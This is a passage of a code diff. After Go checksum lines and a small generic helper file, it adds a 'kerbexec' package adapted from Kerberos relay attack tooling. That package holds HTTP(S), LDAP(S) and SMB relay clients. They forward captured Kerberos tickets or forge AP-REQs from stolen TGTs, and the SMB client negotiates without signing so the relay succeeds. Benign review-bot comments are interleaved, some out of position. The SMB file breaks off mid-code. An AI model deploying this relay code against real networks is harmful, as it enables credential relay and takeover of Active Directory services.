h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.26.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.28.0/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60= +google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk= +google.golang.org/grpc v1.30.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.31.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.31.1/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.34.0/go.mod h1:WotjhfgOW/POjDeRt8vscBtXq+2VjORFy659qA51WJ8= +google.golang.org/grpc v1.35.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= 
+google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.36.1/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.37.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.37.1/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.38.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/grpc v1.39.1/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= +google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= +google.golang.org/grpc v1.42.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= +google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod 
h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15 h1:YR8cESwS4TdDjEe65xsg0ogRM/Nc3DYOhEAlW+xobZo= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= +gopkg.in/ini.v1 v1.66.2 h1:XfR1dOYubytKy4Shzc2LHrrGhU0lDCfDGG1yLPmpgsI= +gopkg.in/ini.v1 v1.66.2/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= +gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.5/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= +gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod 
h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0 h1:hjy8E9ON/egN1tAYqKb61G10WtihqetD4sz2H+8nIeA= +gopkg.in/yaml.v3 v3.0.0/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg= +honnef.co/go/tools v0.0.1-2020.1.3/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k= +honnef.co/go/tools v0.0.1-2020.1.4/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k= +rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8= +rsc.io/quote/v3 v3.1.0/go.mod h1:yEA65RcK8LyAZtP9Kv3t0HmxON59tX3rD+tICJqUlj0= +rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA=
diff --git a/internal/utils.go b/internal/utils.go
new file mode 100644
index 0000000..f7ce20e
--- /dev/null
+++ b/internal/utils.go
@@ -0,0 +1,19 @@
+package internal
+
+func Map[T, U any](collection []T, fn func(T) U) []U {
+ var out []U
+ for i := range collection {
+ out = append(out, fn(collection[i]))
+ }
+ return out
+}
+
+func Filter[T any](collection []T, fn func(T) bool) []T {
+ var out []T
+ for i := range collection {
+ if fn(collection[i]) {
+ out = append(out, collection[i])
+ }
+ }
+ return out
+}
diff --git a/kerbexec/__init__.py b/kerbexec/__init__.py
new file mode 100644
index 0000000..2ae2839
--- /dev/null
+++ b/kerbexec/__init__.py
@@ -0,0 +1 @@
+pass
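Review bot: `Map` and `Filter` in internal/utils.go are exported without doc comments, and `Map` grows `out` by repeated `append` although the result length is always `len(collection)`. Add `// Map returns a new slice holding fn applied to each element of collection, in order.` and `// Filter returns the elements of collection for which fn reports true, in order.` above the two functions. In `Map`, `out := make([]U, 0, len(collection))` avoids the regrowth copies. That preallocation makes an empty input return an empty non-nil slice instead of nil, which is visible to callers that JSON-encode the result or compare it with nil, so keep `var out []U` if any caller relies on the nil result.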
diff --git a/kerbexec/clients/__init__.py b/kerbexec/clients/__init__.py
new file mode 100644
index 0000000..c80ee73
--- /dev/null
+++ b/kerbexec/clients/__init__.py
@@ -0,0 +1,101 @@ +# Copyright (c) 2013-2017 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Protocol Client Base Class definition +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# Defines a base class for all clients + loads all available modules +# +# ToDo: +# +import os, sys, pkg_resources +from impacket import LOG + +PROTOCOL_CLIENTS = {} + +# Base class for Protocol Clients for different protocols (SMB, MSSQL, etc) +# Besides using this base class you need to define one global variable when +# writing a plugin for protocol clients: +# PROTOCOL_CLIENT_CLASS = "" +# PLUGIN_NAME must be the protocol name that will be matched later with the relay targets (e.g. SMB, LDAP, etc) +class ProtocolClient: + PLUGIN_NAME = 'PROTOCOL' + def __init__(self, serverConfig, target, targetPort, extendedSecurity=True): + self.serverConfig = serverConfig + self.targetHost = target.hostname + # A default target port is specified by the subclass + if target.port is not None: + # We override it by the one specified in the target + self.targetPort = target.port + else: + self.targetPort = targetPort + self.target = target + self.extendedSecurity = extendedSecurity + self.session = None + self.sessionData = {} + + def initConnection(self): + raise RuntimeError('Virtual Function') + + def killConnection(self): + raise RuntimeError('Virtual Function') + + def sendNegotiate(self, negotiateMessage): + # Charged of sending the type 1 NTLM Message + raise RuntimeError('Virtual Function') + + def sendAuth(self, authenticateMessageBlob, serverChallenge=None): + # Charged of sending the type 3 NTLM Message to the Target + raise RuntimeError('Virtual Function') + + def sendStandardSecurityAuth(self, sessionSetupData): + # Handle the situation When FLAGS2_EXTENDED_SECURITY is not set + raise RuntimeError('Virtual Function') + + def 
getSession(self): + # Should return the active session for the relayed connection + raise RuntimeError('Virtual Function') + + def getSessionData(self): + # Should return any extra data that could be useful for the SOCKS proxy to work (e.g. some of the + # answers from the original server) + return self.sessionData + + def getStandardSecurityChallenge(self): + # Should return the Challenge returned by the server when Extended Security is not set + # This should only happen with against old Servers. By default we return None + return None + + def keepAlive(self): + # Charged of keeping connection alive + raise RuntimeError('Virtual Function') + +for file in pkg_resources.resource_listdir('lib', 'clients'): + if file.find('__') >=0 or os.path.splitext(file)[1] == '.pyc': + continue + __import__(__package__ + '.' + os.path.splitext(file)[0]) + module = sys.modules[__package__ + '.' + os.path.splitext(file)[0]] + try: + pluginClasses = set() + try: + if hasattr(module,'PROTOCOL_CLIENT_CLASSES'): + for pluginClass in module.PROTOCOL_CLIENT_CLASSES: + pluginClasses.add(getattr(module, pluginClass)) + else: + pluginClasses.add(getattr(module, getattr(module, 'PROTOCOL_CLIENT_CLASS'))) + except Exception as e: + LOG.debug(e) + pass + + for pluginClass in pluginClasses: + LOG.info('Protocol Client %s loaded..' % pluginClass.PLUGIN_NAME) + PROTOCOL_CLIENTS[pluginClass.PLUGIN_NAME] = pluginClass + except Exception as e: + LOG.debug(str(e)) + diff --git a/kerbexec/clients/httprelayclient.py b/kerbexec/clients/httprelayclient.py new file mode 100644 index 0000000..8351ab7 --- /dev/null +++ b/kerbexec/clients/httprelayclient.py 
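Review bot: The plugin loader at the end of this file lists `pkg_resources.resource_listdir('lib', 'clients')` although the file is added as `kerbexec/clients/__init__.py`, so which modules get imported is decided by whatever `lib` package comes first on `sys.path`, while the import itself uses `__package__`. Every file name found is passed to `__import__` and executed, and a failed plugin lookup is only written with `LOG.debug`, so a missing or unexpected module is easy to overlook. I would iterate this package's own path with `for _, name, _ in pkgutil.iter_modules(__path__):` and log load failures at warning level. `pkg_resources` is also deprecated in current setuptools, which is a second reason to move off it.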
@@ -0,0 +1,126 @@ +# Impacket - Collection of Python classes for working with network protocols. +# +# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved. +# +# This software is provided under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Description: +# HTTP Protocol Client +# HTTP(s) client for relaying NTLMSSP authentication to webservers +# +# Author: +# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) +# Alberto Solino (@agsolino) +# +import re +import ssl +try: + from http.client import HTTPConnection, HTTPSConnection, ResponseNotReady +except ImportError: + from httplib import HTTPConnection, HTTPSConnection, ResponseNotReady +import base64 + +from struct import unpack +from impacket import LOG +from lib.clients import ProtocolClient +from lib.utils.kerberos import build_apreq +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED +from impacket.ntlm import NTLMAuthChallenge +from impacket.spnego import SPNEGO_NegTokenResp + +PROTOCOL_CLIENT_CLASSES = ["HTTPRelayClient","HTTPSRelayClient"] + +class HTTPRelayClient(ProtocolClient): + PLUGIN_NAME = "HTTP" + + def __init__(self, serverConfig, target, targetPort = 80, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + self.negotiateMessage = None + self.authenticateMessageBlob = None + self.server = None + self.authenticationMethod = None + + def initConnection(self, authdata, kdc=None): + self.session = HTTPConnection(self.targetHost,self.targetPort) + self.lastresult = None + if self.target.path == '': + self.path = '/' + else: + self.path = self.target.path + return self.doInitialActions(authdata, kdc) + + def doInitialActions(self, authdata, kdc=None): + self.session.request('GET', self.path) + res = self.session.getresponse() + res.read() + if res.status != 401: + LOG.info('Status 
code returned: %d. Authentication does not seem required for URL' % res.status) + try: + if 'Kerberos' not in res.getheader('WWW-Authenticate') and 'Negotiate' not in res.getheader('WWW-Authenticate'): + LOG.error('Kerberos Auth not offered by URL, offered protocols: %s' % res.getheader('WWW-Authenticate')) + return False + if 'Kerberos' in res.getheader('WWW-Authenticate'): + self.authenticationMethod = "Kerberos" + elif 'Negotiate' in res.getheader('WWW-Authenticate'): + self.authenticationMethod = "Negotiate" + except (KeyError, TypeError): + LOG.error('No authentication requested by the server for url %s' % self.targetHost) + if self.serverConfig.isADCSAttack: + LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways') + else: + return False + + # Negotiate auth + if self.serverConfig.mode == 'RELAY': + # Relay mode is pass-through + negotiate = base64.b64encode(authdata['krbauth']).decode("ascii") + else: + # Unconstrained delegation mode has to build TGT manually + krbauth = build_apreq(authdata['domain'], kdc, authdata['tgt'], authdata['username'], 'http', self.targetHost) + negotiate = base64.b64encode(krbauth).decode("ascii") + + headers = {'Authorization':'%s %s' % (self.authenticationMethod, negotiate)} + self.session.request('GET', self.path ,headers=headers) + res = self.session.getresponse() + res.read() + if res.status == 401: + return None, STATUS_ACCESS_DENIED + else: + LOG.info('HTTP server returned status code %d, treating as a successful login' % res.status) + #Cache this + self.lastresult = res.read() + return None, STATUS_SUCCESS + return True + + def killConnection(self): + if self.session is not None: + self.session.close() + self.session = None + + def keepAlive(self): + # Do a HEAD for favicon.ico + self.session.request('HEAD','/favicon.ico') + self.session.getresponse() + +class HTTPSRelayClient(HTTPRelayClient): + PLUGIN_NAME = "HTTPS" + + def __init__(self, serverConfig, target, targetPort = 443, 
extendedSecurity=True ): + HTTPRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + + def initConnection(self, authdata, kdc=None): + self.lastresult = None + if self.target.path == '': + self.path = '/' + else: + self.path = self.target.path + try: + uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) + self.session = HTTPSConnection(self.targetHost,self.targetPort, context=uv_context) + except AttributeError: + self.session = HTTPSConnection(self.targetHost,self.targetPort) + return self.doInitialActions(authdata, kdc) + diff --git a/kerbexec/clients/ldaprelayclient.py b/kerbexec/clients/ldaprelayclient.py new file mode 100644 index 0000000..2f1e6a0 --- /dev/null +++ b/kerbexec/clients/ldaprelayclient.py 
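Review bot: `HTTPSRelayClient.initConnection` builds its context with `ssl.SSLContext(ssl.PROTOCOL_SSLv23)`, which leaves certificate verification and hostname checking off, so the `Authorization` header carrying the Kerberos token goes to whatever endpoint answers on the target address. `PROTOCOL_SSLv23` is also a deprecated alias. If unverified TLS is intended here (for example hosts with self-signed certificates), I would make that an explicit option and default to `ssl.create_default_context()`. Separately, the success branch of `doInitialActions` calls `res.read()` a second time for `self.lastresult`, which is therefore always empty, and the trailing `return True` is unreachable.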
@@ -0,0 +1,61 @@ +import sys +from struct import unpack +from impacket import LOG +from ldap3 import Server, Connection, ALL, NTLM, MODIFY_ADD, SASL, KERBEROS +from ldap3.operation import bind +try: + from ldap3.core.results import RESULT_SUCCESS, RESULT_STRONGER_AUTH_REQUIRED +except ImportError: + LOG.fatal("krbrelayx requires ldap3 > 2.0. To update, use: pip install ldap3 --upgrade") + sys.exit(1) + +from lib.clients import ProtocolClient +from lib.utils.kerberos import ldap_kerberos, ldap_kerberos_auth +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED +from impacket.ntlm import NTLMAuthChallenge, NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_SIGN +from impacket.spnego import SPNEGO_NegTokenResp + +PROTOCOL_CLIENT_CLASSES = ["LDAPRelayClient", "LDAPSRelayClient"] + +class LDAPRelayClientException(Exception): + pass + +class LDAPRelayClient(ProtocolClient): + PLUGIN_NAME = "LDAP" + MODIFY_ADD = MODIFY_ADD + + def __init__(self, serverConfig, target, targetPort = 389, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + self.server = None + + def killConnection(self): + if self.session is not None: + self.session.socket.close() + self.session = None + + def initConnection(self, authdata, kdc=None): + if not kdc: + kdc = authdata['domain'] + self.server = Server("ldap://%s:%s" % (self.targetHost, self.targetPort), get_info=ALL) + self.session = Connection(self.server, user="a", password="b", authentication=SASL, sasl_mechanism=KERBEROS) + if self.serverConfig.mode == 'RELAY': + # Pass-thought auth + ldap_kerberos_auth(self.session, authdata['krbauth']) + else: + # Unconstrained delegation mode + ldap_kerberos(authdata['domain'], kdc, authdata['tgt'], authdata['username'], self.session, self.targetHost) + +class LDAPSRelayClient(LDAPRelayClient): + PLUGIN_NAME = "LDAPS" + MODIFY_ADD = MODIFY_ADD + + def __init__(self, serverConfig, target, targetPort = 636, 
extendedSecurity=True ): + LDAPRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + + def initConnection(self, authdata, kdc=None): + if not kdc: + kdc = authdata['domain'] + self.server = Server("ldaps://%s:%s" % (self.targetHost, self.targetPort), get_info=ALL) + self.session = Connection(self.server, user="a", password="b", authentication=SASL, sasl_mechanism=KERBEROS) + ldap_kerberos(authdata['domain'], kdc, authdata['tgt'], authdata['username'], self.session, self.targetHost) diff --git a/kerbexec/clients/smbrelayclient.py b/kerbexec/clients/smbrelayclient.py new file mode 100644 index 0000000..e591754 --- /dev/null +++ b/kerbexec/clients/smbrelayclient.py 
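Review bot: The `except ImportError` block at the top of ldaprelayclient.py calls `sys.exit(1)` at import time, so an outdated ldap3 terminates the whole process as soon as `clients/__init__.py` imports this plugin. The preceding `from ldap3 import ...` line sits outside the `try`, so a missing ldap3 produces a plain traceback instead of the upgrade hint. I would move both imports under the `try` and re-raise `ImportError` with the hint as its message, leaving the exit decision to the caller. Several imports (`unpack`, `bind`, `NTLM`, the `impacket.ntlm` and `impacket.spnego` names, the two `STATUS_*` codes) are unused in this file, and `user="a", password="b"` deserves a comment such as `# placeholder values; the bind is done by the Kerberos helper below`.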
@@ -0,0 +1,415 @@ +# Copyright (c) 2013-2016 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# SMB Relay Protocol Client +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# This is the SMB client which initiates the connection to an +# SMB server and relays the credentials to this server. + +import os + +from struct import unpack +from socket import error as socketerror +from impacket import LOG +from lib.clients import ProtocolClient +from impacket.examples.ntlmrelayx.servers.socksserver import KEEP_ALIVE_TIMER +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_LOGON_FAILURE +from impacket.ntlm import NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallenge +from impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBSessionSetupAndX_Extended_Parameters, \ + SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Response_Data, \ + SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Parameters +from impacket.smb3 import SMB3, SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, \ + SMB2_NEGOTIATE, SMB2Negotiate, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_GLOBAL_CAP_LEASING, \ + SMB3Packet, SMB2_GLOBAL_CAP_LARGE_MTU, SMB2_GLOBAL_CAP_DIRECTORY_LEASING, SMB2_GLOBAL_CAP_MULTI_CHANNEL, \ + SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, SMB2_NEGOTIATE_SIGNING_REQUIRED, SMB2Packet,SMB2SessionSetup, SMB2_SESSION_SETUP, STATUS_MORE_PROCESSING_REQUIRED, SMB2SessionSetup_Response +from impacket.smbconnection import SMBConnection, SMB_DIALECT, SessionError +from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech + +PROTOCOL_CLIENT_CLASS = "SMBRelayClient" + +class MYSMB(SMB): + def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, 
negPacket=None): + self.extendedSecurity = extendedSecurity + SMB.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negPacket=negPacket) + + def neg_session(self, negPacket=None): + return SMB.neg_session(self, extended_security=self.extendedSecurity, negPacket=negPacket) + +class MYSMB3(SMB3): + def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None): + self.extendedSecurity = extendedSecurity + SMB3.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negSessionResponse=SMB2Packet(negPacket)) + + def negotiateSession(self, preferredDialect = None, negSessionResponse = None): + # We DON'T want to sign + self._Connection['ClientSecurityMode'] = 0 + + if self.RequireMessageSigning is True: + LOG.error('Signing is required, attack won\'t work!') + return + + self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION + currentDialect = SMB2_DIALECT_WILDCARD + + # Do we have a negSessionPacket already? 
+ if negSessionResponse is not None: + # Yes, let's store the dialect answered back + negResp = SMB2Negotiate_Response(negSessionResponse['Data']) + currentDialect = negResp['DialectRevision'] + + if currentDialect == SMB2_DIALECT_WILDCARD: + # Still don't know the chosen dialect, let's send our options + + packet = self.SMB_PACKET() + packet['Command'] = SMB2_NEGOTIATE + negSession = SMB2Negotiate() + + negSession['SecurityMode'] = self._Connection['ClientSecurityMode'] + negSession['Capabilities'] = self._Connection['Capabilities'] + negSession['ClientGuid'] = self.ClientGuid + if preferredDialect is not None: + negSession['Dialects'] = [preferredDialect] + else: + negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30] + negSession['DialectCount'] = len(negSession['Dialects']) + packet['Data'] = negSession + + packetID = self.sendSMB(packet) + ans = self.recvSMB(packetID) + if ans.isValidAnswer(STATUS_SUCCESS): + negResp = SMB2Negotiate_Response(ans['Data']) + + self._Connection['MaxTransactSize'] = min(0x100000,negResp['MaxTransactSize']) + self._Connection['MaxReadSize'] = min(0x100000,negResp['MaxReadSize']) + self._Connection['MaxWriteSize'] = min(0x100000,negResp['MaxWriteSize']) + self._Connection['ServerGuid'] = negResp['ServerGuid'] + self._Connection['GSSNegotiateToken'] = negResp['Buffer'] + self._Connection['Dialect'] = negResp['DialectRevision'] + if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED: + LOG.error('Signing is required, attack won\'t work!') + return + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING: + self._Connection['SupportsFileLeasing'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU: + self._Connection['SupportsMultiCredit'] = True + + if self._Connection['Dialect'] == SMB2_DIALECT_30: + # Switching to the right packet format + self.SMB_PACKET = SMB3Packet + if (negResp['Capabilities'] 
& SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING: + self._Connection['SupportsDirectoryLeasing'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL: + self._Connection['SupportsMultiChannel'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES: + self._Connection['SupportsPersistentHandles'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION: + self._Connection['SupportsEncryption'] = True + + self._Connection['ServerCapabilities'] = negResp['Capabilities'] + self._Connection['ServerSecurityMode'] = negResp['SecurityMode'] + +class SMBRelayClient(ProtocolClient): + PLUGIN_NAME = "SMB" + def __init__(self, serverConfig, target, targetPort = 445, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + + self.domainIp = None + self.machineAccount = None + self.machineHashes = None + self.sessionData = {} + + self.keepAliveHits = 1 + + def keepAlive(self): + # SMB Keep Alive more or less every 5 minutes + if self.keepAliveHits >= (250 / KEEP_ALIVE_TIMER): + # Time to send a packet + # Just a tree connect / disconnect to avoid the session timeout + tid = self.session.connectTree('IPC$') + self.session.disconnectTree(tid) + self.keepAliveHits = 1 + else: + self.keepAliveHits +=1 + + def killConnection(self): + if self.session is not None: + self.session.close() + self.session = None + + def initConnection(self): + self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, manualNegotiate=True) + #,preferredDialect=SMB_DIALECT) + if self.serverConfig.smb2support is True: + data = '\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00' + else: + data = '\x02NT LM 0.12\x00' + + if self.extendedSecurity is True: + flags2 = SMB.FLAGS2_EXTENDED_SECURITY | 
